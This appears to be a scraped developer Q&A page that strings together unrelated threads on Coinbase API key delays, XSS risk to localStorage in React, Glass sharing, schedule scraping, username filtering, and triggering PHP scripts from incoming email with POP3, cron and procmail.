Why my coinbase apikey always set to disabled by default? - coinbase-api

I'm trying to explore the API environment of coinbase. So for the very first time I accidentally set all of the scopes. Then I removed it and I created again.
Now every time I create a new key it will always put to disabled state by default. I keep getting this everytime there is a update write on the scope. The read scope seems to work for most of them (leaving trading related scopes) but not for transactions related scopes for both read and write.
Is there any particular reason why this is happening on my account? It's not verified btw, but that doesn't stop me from using it. Cause I only need a few basic scopes like reading my accounts addresses and transferring funds to another coinbase user something like that. I will not use this for trading.
Any help would be gladly appreciated

It's for security purposes; according to the response email I also got from coinbase.

By the way it will only remain disabled for the next 48 hours for protection purposes. The solution is just to wait for 48 hours and then do all the stuff you want to do.

Related

How a hacker can perform an xss attack if he does not have access to the user computer? [duplicate]

This question already has answers here:
What does it mean when they say React is XSS protected?
(2 answers)
Closed 2 years ago.
I am reading some articles about security in React applications. Indeed, I use localstorage to store the user's infos and I've seen that an xss attack could easily allow a hacker to steal them.
However, I understand that in React, an xss attack can only be performed through a setDangerouslyInnerHtml tag that displays a content written in an input. This way, you can steal his infos, cookies session, ect. and send them to your website.
But a hacker could only do this if he has the chance to write his script on the user's computer right? So, if I don't use any setDangerouslyInnerHtml tag, is the localstorage safe in a React app? If not, how a hacker could run such an attack on the website?
If the user uses a public computer it might be possible.
If you have some functionality which allows external users to post content on your site, for example comments or reactions then someone might write a script which sends localstorage data to a hacker.
There are a lot of ways to exploit this, check owasp for more detailed explanation.
https://owasp.org/www-project-top-ten/
Developers must accept what attackers can do:
They can retheme an entire site,
They can too make "bot" scripts to automate tasks and in other words flood your server if that was the task.
All limits defined in JS/HTML can and will be bypassed, (e.g: character lengths in forms/etc)
The entire page can be re-written to not talk to your server-right, in other words crashing it and more if not handled/detected.
The list goes on but accept it's pretty much all off the table if someone wants to pry hard enough.
There's not a whole lot you can do to prevent this, to explain! You can add an external script from randomxyxsite.com and though trusted could under-go an attack where that script now runs "loggers or some type of analytic grabbing bot", this in my opinion is easily avoided by not adding external scripts if you can.
Though I said what I said originally, here's where you're stuck...
Any user can open console/build extensions or use a third-party loader like Tampermonkey and other alternatives and execute script at their will. This too can become "shared" and comparable to botnet behavior.
So what can you do to stop clients from mis-behaving or "super-modding" their content for malicious server-use?
Some ways to safe-guard:
Server-sided requests should pass through some form of check/sanitization to ensure that whatever any of the clients pass-to it is absolutely safe to absorb.
Never let the user tell you who they beyond login, define these users by sessionid; know these users by their session and when user<>user, get between them and follow the above point.
Keep as much as possible private. Public variables/classes/functions are easily re-written during run-time leaving some features you maybe intended on to fall apart.
window.PayFeature = function(){};
ALLOW XSS:
If feared, a developer should study it more. As much as a user can distort/change their end it's only an issue if the traffic changes or the data received from them starts becoming attack like. So for a developer your best bet is to actually rate-limit, set rules and more for users so that abuse is detected and stopped. As long as you do that, you should never fear it but welcome it, when server is secured it becomes a matter of spam (potential botnet)

Any recent changes in how contacts identify themselves to the Mirror API?

I'm concerned - when I take a picture, I usually (ie, last week) am able to share the image to my app.
Now, however, only Google + contacts appear as share targets. For example, if I turn off sharing to G+, I get no Share options at all, only a greyed-out Share dialog that says "Visit google.com/myglass to add friends"
However, when I go to that address I clearly see my app and a number of contacts (who aren't in G+) who also usually show up.
Has something changed to cause this behavior? For example, is the code listed in the starter-project no longer sufficient to register a share target for photos?
For example, I could imagine that suddenly the acceptTypes[] parameter was now mandatory. But I'd love to hear someone closer to the API weigh in, if possible.
Thanks!
AKA
I solved this by following Alain's comment's advice.
It's very easy to think that the "Contacts" page you see at https://glass.google.com/myglass is all there is.
But if you want your app to receive shared stuff, you have to go here: https://glass.google.com/myglass/share

Need ideas on retrieving data from a website

I'm stumped and need some ideas on how to do this or even whether it can be done at all.
I have a client who would like to build a website tailored to English-speaking travelers in a specific country (Thailand, in this case). The different modes of transportation (bus & train) have good web sites for providing their respective information. And both are very static in terms of the data they present (the schedules rarely change). Here's one of the sites I would need to get info from: train schedules The client wants to provide users the ability to search for a beginning and end location and determine, using the external website's information, how they can best get there, being provided a route with schedule times for the different modes of chosen transport.
Now, in my limited experience, I would think the way to do that would be to retrieve the original schedule info from the external site's server (via API or some other means) and retain the info in a database, which can be queried as needed. Our first thought was to contact the respective authorities to determine how/if this can be done, but this has proven to be problematic due to the language barrier, mainly.
My client suggested what is basically "screen scraping", but that sounds like it would be complicated at best, downloading the web page(s) and filtering through the HTML for relevant/necessary data to put into the database. My worry is that the info on these mainly static sites is so static, that the data isn't even kept in a database to build the page and the web page itself is updated (hard-coded) when something changes.
I could really use some help and suggestions here. Thanks!
Screen scraping is always problematic IMO as you are at the mercy of the person who wrote the page. If the content is static, then I think it would be easier to copy the data manually to your database. If you wanted to keep up to date with changes, you could then snapshot the page when you transcribe the info and run a job to periodically check whether the page has changed from the snapshot. When it does, it sends an email for you to update it.
The above method could also be used in conjunction with some sort of screen scaper which could fall back to a manual process if the page changes too drastically.
Ultimately, it is a case of how much effort (cost) is your client willing to bear for accuracy
I have done this for the following site: http://www.buscatchers.com/ so it's definitely more than doable! A key feature of a web scraping solution for travel sites is that it must send you emails if anything went wrong during the scraping process. On the site, I use a two day window so that I have two days to fix the code if the design changes. Only once or twice have I had to change my code, and it's very easy to do.
As for some examples. There is some simplified source code here: http://www.buscatchers.com/about/guide. The full source code for the project is here: https://github.com/nicodjimenez/bus_catchers. This should give you some ideas on how to get started.
I can tell that the data is dynamic, it's to well structured. It's not hard for someone who is familiar with xpath to scrape this site.

Preventing dictionary user names for registration

When I was setting up an account with gmail few years back (probably this is still a case, haven't check) I've noticed that system doesn't allow to register common terms, nouns as username, it seemed that it used a sort of dictionary for screening. I would like to implement similar feature in my app, anyone have idea how to tackle this? App is written in PHP but understand I'll have to hook it up with online service.
Thanks
Wordpress MU has such feature too, you fill a list of possible usernames that you want to avoid and they become unavailable for users. You can check its source to get their approach...
Sinan.
Well the API will vary from service to service so I'd suggest you find one, look at their developer docs and then if you have a question ask it here.

How to control a web application through email? Or how to run php script by sending an email?

I want to run a web application on php and mysql, using the CakePHP framework. And to keep the threshold of using the site at a very low place, I want to not use the standard login with username/password. (And I don't want to hassle my users with something like OpenID either. Goes to user type.)
So I'm thinking that the users shall be able to log in by sending an email to login#domain.com with no subject or content required. And they will get, in reply, an email with a link that will log them in (it will contain a hash). Also I will let the users do some actions without even visiting the site at all, just send an email with command#domain.com and the command will be carried out. I will assume that the users and their email providers takes care of their email account security and as such there is no need for it on my site.
Now, how do I go from an email is sent to an account that is not read by humans to there being fired off some script (basically a "dummy browser client" calls an url( and the cakephp will take care of the rest)?
I have never used a cron job before, but I do think I understand their purpose or how they generally work. I can not have the script be called by random people visiting the site, as that solution won't work for several reasons. I think I would like to hear more about the possibility of having the script be run as response to an email coming in, if anyone has any input at all on that. If it's run as a cron job it would only check every X minutes and users would get a lag in their response (if i understand it correctly).
Since there will be different email addresses for different commands, like login#domain.com and I know what to do and how to do it to based on the sender email, i dont even need the content, subject or any other headers from the email.
There is a lot of worry about security of this application, I understand the issues, but without giving away my concept, I dont think it is a big issue for what I am doing. Also about the usability issue, there really isnt any. It's just gonna be login to provide changes on a users profile if/when they need that and one other command. And this is the main email and is very easy to remember and the outset of this whole concept.
I have used the pop3 php class with great success (there is also a Pear POP3 module).
Using the pop3 class looks something like this:
require ('pop3.php');
$pop3 = new pop3_class();
$pop3->hostname = MAILHOST;
$pop3->Open();
$pop3->Login('myemailaddress#mydomain.com', 'mypassword');
foreach($pop3->ListMessages("","") as $msgidx => $msgsize)
{
$headers = "";
$body = "";
$pop3->RetrieveMessage($msgidx, $headers, $body, -1);
}
I use it to monitor a POP3 mailbox which feeds into a database.
It gets called by a cronjob which uses wget to call the url to my php script.
*/5 * * * * "wget -q --http-user=me --http-passwd=pass 'http://mydomain.com/mail.php'" >> /dev/null 2>&1
Edit
I've been thinking about your need to have users send certain site commands by email.
Wouldn't it be easier to have a single address that multiple commands can be sent to rather than having multiple addresses?
I think the security concerns are pretty valid too. Unless the commands are non-destructive or aren't doing anything user-specific, the system will be wide open to anyone who knows how to spoof an email address (which would be everyone :) ).
You'll need some sort of CronJob/Timer Service that checks the Mailbox regularly and then acts on it. Alternatively, you should check the mailserver if it can run a script when a mail arrives (i.e. see if it's possible to put a spamfilter-script in and "abuse" that functionality to call your script instead).
With pure PHP, you're mostly out of luck as something needs to trigger the script. On a Pagewith a LOT of traffic, you could have your index.php or whatever do the check, but when no one visits your site for quite some time, then the mail will not be sent, and you have to be careful of "race conditions" when multiple people are accessing the script at the same time.
Edit: Just keep one usability flaw in mind: People with Multiple PCs and without an e-Mail Client on every one. For example, I use 4 PCs, but only 1 (my main one) has a Mail Client installed, and I use Webmail to check the other ones. Now, logging in and sending a mail through Webmail is not the greatest usability - in order to use YOUR site, I first have to log in to ANOTHER site, compose a mail through the crappy interface most Webmail tools have and wait for answer. Could as well use OpenID there :-)
If your server allows it you can use a .forward file or Procmail to start a process (php or anything) when a mail arrives to a certain address.
You don't want to hassle users with OpenID, but you want them to deal with this email scheme. Firstly, email can take a long time to go through. There isn't any guaranteed time that an email will be delivered in. It's not even guaranteed that the email will get there at all. I know things usually are quick, but it's not uncommon to take up to 10 minutes for a round trip to be completed. Also, unless you're encrypting the email, the link you are sending back is sent in the open. That means anybody can use that link to log in. Depending one how secure you want to be, this may or may not be an issue, but it's definitely something to think about. Using a non-standard login method like this is going to be a lot more work than it is probably worth, and I can't really see any advantages to the whole process.
I was also thinking using procmail to start some script. There is also formail, which might come in handy to change or extract headers. If you have admin access to the mail server, you could also use /etc/aliases and just pipe to your script.
Besides usability issues, you should really think about security - it's actually quite simple to send email with a fake sender address, so I would not rely on it for anything critical.
I agree with all the security concerns. Your assumption that "the users and their email providers takes care of their email account security" is not correct when it comes to the sender's e-mail address.
But since you specifically asked "how do I go from an email is sent to an account that is not read by humans to there being fired off some script", I recommend using procmail to deliver the incoming e-mail to a script you write.
I would not call a URL. I would have the script perform the work by reading the message sent in on stdin. That way, the script is not acessible to anyone on the web site.
To set this up, the e-mail address you provide to your users will have to be associated with a real user
on the system. In that user's home directory, create a file called ".procmailrc"
In that file, add these two lines:
:0 hb:
| /path/to/program
Where /path/to/program is the full path to the script or program for handling
the incoming message. Then create the script with code something like this:
#!/usr/bin/php
<?php
$fp=fopen('php://stdin','r');
while($line = fgets($fp)) {
[do something with each $line of input here]
}
?>
The e-mail message will not remain in the mailbox, so if you want to save or log it, have the script do it.
--
Bruce
I would seriously reconsider this approach. E-mail hasn't got very high reliability. There's all kinds of spamfilters that might intercept e-mails with links thereby rendering the "command" half-finished, not to mention the security risks.
It's very easy to spoof the sender-address on an e-mail. You are basically opening up your system to anyone.
Also instead of a username/password combination you're suddenly requiring the users to remember a list of commands to put in front of an email-address. It would be better to provide them with a username/password and then giving access to a help page.
In other words the usability and security of this scheme scores very low.
I can't really find any advantages to this approach that even comes close to outweighing the massive disadvantages.
One solution to prevent spam, make sure the first line, last line or a specific line contains a certain string, almost like a password, but a full sentence is better.
Only you have the word or words, pretty secure, just remember to delete the mails after use and those that do not have the secret line.
Apart from the security and usability email delivery can be another problem. Depending on the user's email provider, email delivery can be delayed from a few minutes to few hours.
There is a realy nice educational story on thedailywtf.com on designing software. The posed question should be solved by a proper design, not by techo-woopla.
Alexander, please read the linked story and think gloves, not email-driven webpage browsing.
PHP is not a hammer.

Resources